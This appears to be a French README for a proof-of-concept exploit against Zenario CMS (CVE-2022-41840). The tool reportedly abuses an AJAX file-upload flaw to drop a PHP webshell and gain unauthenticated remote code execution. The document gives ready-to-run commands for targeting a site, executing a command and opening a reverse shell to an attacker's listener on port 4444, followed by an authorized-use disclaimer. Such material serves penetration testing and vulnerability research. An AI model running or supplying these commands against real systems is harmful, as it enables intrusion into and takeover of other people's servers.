
Ceci est l'exploit PoC pour la CVE-2022-41840, affectant Zenario.
Une vulnérabilité d'exécution de code à distance (RCE) non authentifiée affectant Zenario CMS version 9.3 et antérieures. L'exploit exploite une vulnérabilité d'upload de fichier dans le point de terminaison AJAX pour téléverser un webshell PHP et obtenir une exécution de code.
/zenario/ajax.phppython3 zenario_exploit.py --target http://target.com
python3 zenario_exploit.py --target http://target.com --cmd "id"
python3 zenario_exploit.py --target http://target.com --lhost 10.x.x.x --lport 4444
requestsInstaller les dépendances :
pip install requests
À des fins éducatives et de tests de sécurité autorisés uniquement.
Cet outil est fourni aux chercheurs en sécurité et aux testeurs d'intrusion pour tester les systèmes qu'ils possèdent ou pour lesquels ils disposent d'une autorisation explicite. L'accès non autorisé à des systèmes informatiques est illégal et strictement interdit.
Les mainteneurs déclinent toute responsabilité en cas d'utilisation abusive ou de dommages causés par cet outil.
Ce code est fourni à des fins éducatives.